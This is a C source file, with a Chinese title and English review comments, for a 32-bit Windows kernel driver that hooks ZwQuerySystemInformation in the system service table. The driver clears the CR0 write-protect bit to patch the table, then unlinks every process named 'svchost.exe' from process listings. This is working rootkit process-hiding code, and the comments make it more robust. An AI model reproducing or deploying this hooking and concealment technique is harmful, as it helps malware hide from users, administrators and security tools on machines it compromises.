ZwQuerySystemInformation 隐藏程序进程 (hiding a process by hooking ZwQuerySystemInformation in the x86 SSDT and unlinking its record from the SystemProcessInformation list)
#include "ntddk.h"
#include "string.h"
// IOCTL code defined by the original author; nothing in this listing uses it.
#define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS)
// 4047 ("differs in levels of indirection") silences the function-pointer <-> unsigned int
// stores into ServiceTableBase further down; 4018 is the signed/unsigned comparison warning.
#pragma warning(disable: 4047 4018)
// Without braces this linkage specification applies only to the next declaration.
#ifdef __cplusplus
extern "C"
#endif
/*
 * Per-thread record that follows each process record in the
 * SystemProcessInformation buffer. Undocumented layout, copied as the
 * original author used it; not verified here against a specific Windows build.
 */
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime; // time spent in kernel mode
LARGE_INTEGER UserTime; // time spent in user mode
LARGE_INTEGER CreateTime; // thread creation time
ULONG WaitTime; // wait time
PVOID StartAddress; // thread start address
CLIENT_ID ClientIs; // process id / thread id of the thread (field name kept as in the original)
KPRIORITY Priority; // current priority
KPRIORITY BasePriority;// base priority
ULONG ContextSwitchCount;// number of context switches
ULONG ThreadState; // thread state
KWAIT_REASON WaitReason; // why the thread is waiting
};
/*
 * One process record in the SystemProcessInformation (class 5) buffer.
 * Records are chained by NextEntryDelta (byte offset to the next record,
 * 0 on the last one); HookZwQuerySystemInformation walks that chain and
 * edits the offsets to unlink the record it hides. Undocumented layout,
 * copied as the original author used it.
 */
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta; // byte offset from this record to the next; 0 marks the last record
ULONG ThreadCount; // number of thread records that follow this record
ULONG Reserved; //
LARGE_INTEGER CreateTime;// process creation time
LARGE_INTEGER UserTime; // total user-mode time of all threads
LARGE_INTEGER KernelTime; // total kernel-mode time of all threads
UNICODE_STRING ProcessName; // image name; Buffer is a pointer, so when the buffer came from user mode this is caller-controlled data
KPRIORITY BasePriority; // default thread priority
ULONG ProcessId; // process id
ULONG InheritedFromProcessId; // parent (handle-inheritance source) process id
ULONG HandleCount; // number of open handles
ULONG Reserved2; //
VM_COUNTERS VmCounters; // virtual memory statistics
IO_COUNTERS IoCounters; // I/O statistics (original note: "only for 2000")
struct _SYSTEM_THREADS Threads;// declared as one element; per the original comment, ThreadCount of these follow back-to-back
};
#pragma pack(1)
/*
 * Layout of ntoskrnl's exported KeServiceDescriptorTable entry. The hook code
 * below patches ServiceTableBase; NumberOfServices gives the valid index range.
 * 4-byte pointer/int fields: this is an x86-only layout.
 */
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase; // array of system service routine addresses, indexed by service number
unsigned int *ServiceCounterTableBase; // per-service call counters
unsigned int NumberOfServices; // number of entries in ServiceTableBase
unsigned char *ParamTableBase; // per-service argument byte counts
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
#pragma pack()
//系统服务表入口地址
// ntoskrnl exports KeServiceDescriptorTable as data. It is declared here as a
// pointer (not the structure) and dereferenced with -> below.
// NOTE(review): that only works if the linker binds this name to the import
// slot holding the table's address — a linker-behaviour dependency, not a
// language guarantee; confirm with the toolchain in use.
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
// Declared by hand (presumably not available from the headers in use).
// The class argument is a plain ULONG; class 5 is SystemProcessInformation.
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass, // which system information to return
IN PVOID SystemInformation, // caller's output buffer
IN ULONG SystemInformationLength, // size of that buffer in bytes
OUT PULONG ReturnLength); // size actually returned (per the original comment)
// Signature of the original service routine, so the saved SSDT entry can be called.
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)
(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
// The SSDT entry that was in place before the hook; DriverUnload restores it.
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;
// Name of the process to hide; initialised inside the hook.
UNICODE_STRING hide_process_name;
// Saved CR0 so the write-protect bit can be restored after patching the SSDT.
ULONG CR0VALUE;
// Replacement service routine: forwards to the original, then edits class-5 results.
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
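/*
 * Returns the system service number that a 32-bit Zw* stub loads into eax:
 * the stub starts with "mov eax, imm32" (B8 xx xx xx xx), so the number sits
 * at byte offset 1. This is an x86-only trick; on any other stub layout the
 * value is garbage, which is why the caller range-checks it.
 */
static ULONG SsdtIndexOfZwStub(PVOID zwStub)
{
    return *(PULONG)((PUCHAR)zwStub + 1);
}

/*
 * Stores target into KeServiceDescriptorTable->ServiceTableBase[index].
 * The SSDT lives on read-only pages, so CR0.WP is cleared around the store
 * and the saved CR0 is written back afterwards. CR0 is per-processor: the
 * IRQL is raised to DISPATCH_LEVEL first so this thread cannot be moved to
 * another CPU (where WP is still set) between the two CR0 writes — the
 * original toggled CR0 at PASSIVE_LEVEL with no such protection. Interrupts
 * stay enabled, so an interrupt handler on this CPU may run briefly with WP
 * clear; that risk is unchanged from the original.
 */
static VOID WriteSsdtEntry(ULONG index, PVOID target)
{
    KIRQL oldIrql;
    ULONG savedCr0;

    KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
    __asm {
        mov eax, cr0
        mov savedCr0, eax
        and eax, 0fffeffffh // clear CR0.WP (bit 16): DisableWriteProtect
        mov cr0, eax
    }
    KeServiceDescriptorTable->ServiceTableBase[index] = (unsigned int)(ULONG_PTR)target;
    __asm {
        mov eax, savedCr0 // EnableWriteProtect: restore the saved CR0
        mov cr0, eax
    }
    KeLowerIrql(oldIrql);
}

/*
 * Driver entry point. Saves the current SSDT entry for ZwQuerySystemInformation
 * in RealZwQuerySystemInformation and replaces it with HookZwQuerySystemInformation.
 * Returns STATUS_UNSUCCESSFUL instead of patching an arbitrary address when the
 * decoded service number is outside the table (e.g. the stub-layout assumption
 * in SsdtIndexOfZwStub does not hold). RegistryPath is not used.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    ULONG index;

    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;

    index = SsdtIndexOfZwStub((PVOID)ZwQuerySystemInformation);
    if (index >= KeServiceDescriptorTable->NumberOfServices) {
        DbgPrint(("Driver load refused: SSDT index out of range"));
        return STATUS_UNSUCCESSFUL;
    }

    // Keep the original routine: the hook forwards to it and DriverUnload restores it.
    RealZwQuerySystemInformation =
        (REALZWQUERYSYSTEMINFORMATION)KeServiceDescriptorTable->ServiceTableBase[index];
    WriteSsdtEntry(index, (PVOID)HookZwQuerySystemInformation);

    DbgPrint(("Driver has been Load !"));
    return STATUS_SUCCESS;
}

/*
 * Unload routine: puts the saved SSDT entry back. Threads that are already
 * inside HookZwQuerySystemInformation when the entry is swapped will still
 * return into this image, so a short delay is taken before unload completes.
 * NOTE(review): that is a grace period, not a guarantee — a robust version
 * counts in-flight calls and waits for the count to reach zero.
 */
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
{
    LARGE_INTEGER grace;

    UNREFERENCED_PARAMETER(pDriverObject);
    if (RealZwQuerySystemInformation != NULL) {
        WriteSsdtEntry(SsdtIndexOfZwStub((PVOID)ZwQuerySystemInformation),
                       (PVOID)RealZwQuerySystemInformation);
        RealZwQuerySystemInformation = NULL;
    }
    grace.QuadPart = -10 * 1000 * 1000; // relative: 1 s in 100 ns units
    KeDelayExecutionThread(KernelMode, FALSE, &grace);

    DbgPrint(("Driver has been Unload !"));
    return;
}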
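/*
 * Follows NextEntryDelta from record. Returns NULL at the end of the chain,
 * or when the next record's fixed part would not lie inside [start, end).
 * The buffer was filled by the real service but may be user-mode memory that
 * the caller has since rewritten, so the offset is validated before use.
 */
static struct _SYSTEM_PROCESSES *NextProcessRecord(struct _SYSTEM_PROCESSES *record,
                                                   PUCHAR start, PUCHAR end)
{
    PUCHAR next;

    if (record->NextEntryDelta == 0)
        return NULL;
    next = (PUCHAR)record + record->NextEntryDelta;
    // next <= record catches pointer wrap-around; the rest keeps the fixed
    // header (everything before the Threads array) inside the buffer.
    if (next <= (PUCHAR)record || next < start || next > end ||
        (ULONG)(end - next) < FIELD_OFFSET(struct _SYSTEM_PROCESSES, Threads))
        return NULL;
    return (struct _SYSTEM_PROCESSES *)next;
}

/*
 * TRUE when the name's characters lie inside [start, end). The real service
 * is expected to place them in the same output buffer; a Buffer pointing
 * anywhere else is treated as corruption or tampering and the record is
 * simply left visible rather than read through.
 */
static BOOLEAN NameInsideBuffer(const UNICODE_STRING *name, PUCHAR start, PUCHAR end)
{
    PUCHAR chars = (PUCHAR)name->Buffer;

    if (chars == NULL || chars < start || chars > end)
        return FALSE;
    return (ULONG)(end - chars) >= name->Length;
}

/*
 * Replacement for ZwQuerySystemInformation. Every call is forwarded to the
 * saved original; when that succeeds for class 5 (SystemProcessInformation)
 * the returned process records are walked and each one named "svchost.exe"
 * (case-insensitive) is unlinked by adding its NextEntryDelta to its
 * predecessor's. The real call's status is always returned unchanged.
 *
 * Security: SystemInformation is whatever the caller passed — for a system
 * call that is user-mode memory the caller can rewrite or unmap while this
 * walk runs. The original trusted NextEntryDelta and ProcessName.Buffer
 * blindly, so a local user could steer kernel reads (and the predecessor
 * write) to arbitrary addresses. The walk is therefore bounded to
 * [buffer, buffer + SystemInformationLength) and wrapped in SEH; on any
 * fault or inconsistency it stops early.
 *
 * A matching record at the head of the chain has no predecessor to patch;
 * the original only advanced its local copy of the SystemInformation pointer
 * there, which the caller never sees, so such a record stays visible here too.
 */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
    NTSTATUS status;
    UNICODE_STRING hiddenName;
    PUCHAR bufferStart;
    PUCHAR bufferEnd;
    struct _SYSTEM_PROCESSES *record;
    struct _SYSTEM_PROCESSES *previous = NULL; // last record still reachable from the chain

    status = RealZwQuerySystemInformation(SystemInformationClass, SystemInformation,
                                          SystemInformationLength, ReturnLength);
    if (!NT_SUCCESS(status) || SystemInformationClass != 5 /* SystemProcessInformation */)
        return status;
    // Nothing that can be walked safely: no buffer, or one too small for even one fixed header.
    if (SystemInformation == NULL ||
        SystemInformationLength < FIELD_OFFSET(struct _SYSTEM_PROCESSES, Threads))
        return status;

    RtlInitUnicodeString(&hiddenName, L"svchost.exe");
    bufferStart = (PUCHAR)SystemInformation;
    bufferEnd = bufferStart + SystemInformationLength;

    __try {
        record = (struct _SYSTEM_PROCESSES *)bufferStart;
        // Like the original, start scanning at the second record (the first is the Idle process).
        if (record->NextEntryDelta != 0)
            record = NextProcessRecord(record, bufferStart, bufferEnd);

        while (record != NULL) {
            BOOLEAN hide = NameInsideBuffer(&record->ProcessName, bufferStart, bufferEnd) &&
                           RtlCompareUnicodeString(&hiddenName, &record->ProcessName, TRUE) == 0;

            if (hide && previous != NULL) {
                // Make the predecessor skip this record; 0 if this was the last one.
                previous->NextEntryDelta = (record->NextEntryDelta != 0)
                    ? previous->NextEntryDelta + record->NextEntryDelta
                    : 0;
            }
            // A hidden record must not become the predecessor: the next unlink
            // has to patch a record that is still on the chain.
            if (!hide)
                previous = record;
            record = NextProcessRecord(record, bufferStart, bufferEnd);
        }
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        // The buffer went away or became unreadable mid-walk (user mode can
        // do that at any time). The real call already completed, so its
        // status is still the right answer; any records not yet unlinked
        // are simply left visible.
    }
    return status;
}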